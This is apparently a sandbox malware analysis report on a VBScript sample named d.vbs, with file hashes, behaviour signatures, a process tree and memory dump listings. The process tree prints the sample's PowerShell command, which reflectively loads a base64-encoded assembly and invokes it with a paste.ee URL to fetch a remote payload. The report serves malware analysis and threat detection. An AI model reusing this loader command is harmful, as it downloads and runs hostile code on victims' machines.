Overview

overview

10

Static

static

d.vbs

windows7-x64

1

d.vbs

windows10-2004-x64

10

Resubmissions

31-08-2022 12:55

220831-p6am9agbe2 10

19-08-2022 17:19

220819-vwbqfsgcdj 10

Analysis

  • max time kernel
    40s
  • max time network
    43s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    31-08-2022 12:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    d.vbs

  • Size

    816KB

  • MD5

    2af5abb6db76b3f1872d568880aced94

  • SHA1

    1e47fb1ba30452f72db8f71fe8dde5a7ad5c1f2c

  • SHA256

    3da90ba538cd2589d4018e15b760db3c508d6ffbb7032e3a66789a4c9d09c7b2

  • SHA512

    ba2e899b365b637547301e2402f16f686badb3f182456dc9c552d1e25eb5a6ca6fa9d75cfe9e260f6ba0edba608daf7dee516cc58c659b8b4844388b330889d2

  • SSDEEP

    6144:nfBfcfYfBfcfhfKfzfffBfcfYfBfcfhfKfqfBfcfYfBfcfhfKfdfBfcfYfBfcfht:r

Score
1/10

Malware Config

Signatures

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1504
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $fs = Get-Content -Path 'C:\Windows\Temp\dll4.txt';[Byte[]] $rOWg = [system.Convert]::FromBase64string( $fs );[Reflection.Assembly]::Load($rOWg).GetType('ClassLibrary2.Class1').GetMethod('execution').Invoke($null, [object[]] ('https://paste.ee/d/6g9rH/0'))
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:112

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/112-57-0x000007FEF4760000-0x000007FEF5183000-memory.dmp

    Filesize

    10.1MB

    Download

  • memory/112-58-0x000007FEF3C00000-0x000007FEF475D000-memory.dmp

    Filesize

    11.4MB

    Download

  • memory/112-59-0x0000000002334000-0x0000000002337000-memory.dmp

    Filesize

    12KB

    Download

  • memory/112-60-0x000000000233B000-0x000000000235A000-memory.dmp

    Filesize

    124KB

    Download

  • memory/112-61-0x0000000002334000-0x0000000002337000-memory.dmp

    Filesize

    12KB

    Download

  • memory/112-62-0x000000000233B000-0x000000000235A000-memory.dmp

    Filesize

    124KB

    Download

  • memory/1504-54-0x000007FEFC141000-0x000007FEFC143000-memory.dmp

    Filesize

    8KB

    Download